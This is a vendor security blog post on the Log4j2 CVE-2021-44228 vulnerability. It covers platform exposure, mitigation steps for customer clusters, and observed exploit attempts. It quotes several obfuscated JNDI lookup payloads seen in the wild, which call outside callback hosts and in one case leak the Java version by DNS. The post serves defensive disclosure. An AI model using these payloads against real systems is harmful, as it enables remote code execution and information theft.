This blog relates to an ongoing investigation. We will update it with any significant updates, including detection rules to help people investigate potential exposure due to CVE-2021-44228 both within their own usage on Databricks and elsewhere. Should our investigation conclude that customers may have been impacted, we will individually notify those customers proactively by email.
As you may be aware, there has been a 0-day discovery in Log4j2, the Java Logging library, that could result in Remote Code Execution (RCE) if an affected version of log4j (2.0 <= log4j <= 2.14.1) logs an attacker-controlled string value without proper validation. Please see more details on CVE-2021-44228.
We currently believe the Databricks platform is not impacted. Databricks does not directly use a version of log4j known to be affected by the vulnerability within the Databricks platform in a way we understand may be vulnerable to this CVE (e.g., to log user-controlled strings). We have investigated multiple scenarios including the transitive use of log4j and class path import order and have not found any evidence of vulnerable usage so far by the Databricks platform.
While we don’t directly use an affected version of log4j, Databricks has out of an abundance of caution implemented defensive measures within the Databricks platform to mitigate potential exposure to this vulnerability, including by enabling the JVM mitigation (log4j2.formatMsgNoLookups=true) across the Databricks control plane. This protects against potential vulnerability from any transitive dependency on an affected version that may exist, whether now or in the future.
Potential issues with customer code
While we do not believe the Databricks platform is itself impacted, if you are using log4j within your Databricks dataplane cluster (e.g., if you are processing user-controlled strings through log4j), your use may be potentially vulnerable to the exploit if you have installed and are using an affected version or have installed services that transitively depend on an affected version.
Please note that the Databricks platform is also partially protected from potential exploit within the data plane even if our customers utilize a vulnerable version of log4j within their own code as the platform does not use versions of JDKs that are particularly concerning for potential exploit (<= 8u191 for Java 8 and <= 11.0.1 for Java 11, which are configured to load the classes necessary to trigger the RCE via an attacker-controlled LDAP server). As a consequence, even certain usage by our customers of a vulnerable log4j version may be at least partially mitigated.
Recommended mitigation steps
Nevertheless, in an abundance of caution, you may wish to reconfigure any cluster on which you have installed an affected version of log4j (>=2.0 and <=2.14.1), we strongly suggest that you either:
- update to log4j 2.15+; and/or
- for log4j2.10-2.14.1, reconfigure the cluster with the known temporary mitigation implemented (log4j2.formatMsgNoLookups set to true) and restarting the cluster
The steps to mitigate 2.10-2.14.1 are:
- Edit the cluster and job with the spark conf “spark.driver.extraJavaOptions” and “spark.executor.extraJavaOptions” set to “-Dlog4j2.formatMsgNoLookups=true”
- Confirm edit to restart the cluster, or simply trigger a new job run which will use the updated java options.
- You can confirm that these settings have taken effect in the “Spark UI” tab, under “Environment”
Please note that because we do not control the code you run through our platforms, we cannot confirm that the migitations will be sufficient for your use cases.
Signals of potential attempted exploit
As part of our investigation, we continue to analyze traffic on our platform in depth. To date, we have not found any evidence of this vulnerability being successfully exploited against either the Databricks platform itself or our customers’ use of the platform.
We have, however, discovered a number of signals that we think may be of significant interest to the security community:
In the initial hours following this vulnerability becoming widely known, automated scanners began scouring the internet utilizing simple callbacks to identify potential targets. While the vast majority of scans are using the LDAP protocol used in the initial proof-of-concept, we have seen callback attempts utilizing the following protocols:
Additionally, we have seen attackers attempt to obfuscate their activities to avoid prevention or detection by nesting message lookups. The following example (from a manipulated UserAgent field) will bypass simple filters/searches for “jndi:ldap”:
${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}
This obfuscation is not limited to the method, as message lookups can be deeply nested. As an example, this very exotic probe attempts to wildly obfuscate the JNDI lookup as well:
${j${KPW:MnVQG:hARxLh:-n}d${cMrwww:aMHlp:LlsJc:Hvltz:OWeka:-i}:${jgF:IvdW:hBxXUS:-l}d${IGtAj:KgGmt:mfEa:-a}p://1639227068302CJEDj.kfvg5l.dnslog.cn/249540}
Even without successful remote code execution, attackers can gain valuable insight into the state of the target environment, as message lookups can leak environment variables and other system information. This example attempts to enumerate the java version on the target system:
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${sys:java.version}.xxx.yyy.databricks.com.as3z18.dnslog.cn}
Modern Java runtimes, including the versions used within the Databricks platform, include restrictions that make wide scale exploitation of this vulnerability more difficult. However, as mentioned in the Veracode research blog “Exploiting JNDI Injections in Java,” attackers can utilize certain already-existing object factories in the local classpath to trigger this (and similar) vulnerabilities. Attempts to load a remote class using a gadget chain which does not exist on target may produce Java stack traces with a warning containing “Error looking up JNDI resource [ldap://xxx.yyy.yyy.zzz:port/class]”. This is something to be on the lookout for beyond the standard callback scanning which may indicate a more sophisticated exploitation attempt.
Security community call to action
We encourage the security community to keep sharing indicators of compromise and exploitation techniques to further protect from this critical vulnerability. If you prefer to engage privately please contact us as security@databricks.com.
--
Try Databricks for free. Get started today.
The post Log4j2 Vulnerability (CVE-2021-44228) Research and Assessment appeared first on Databricks.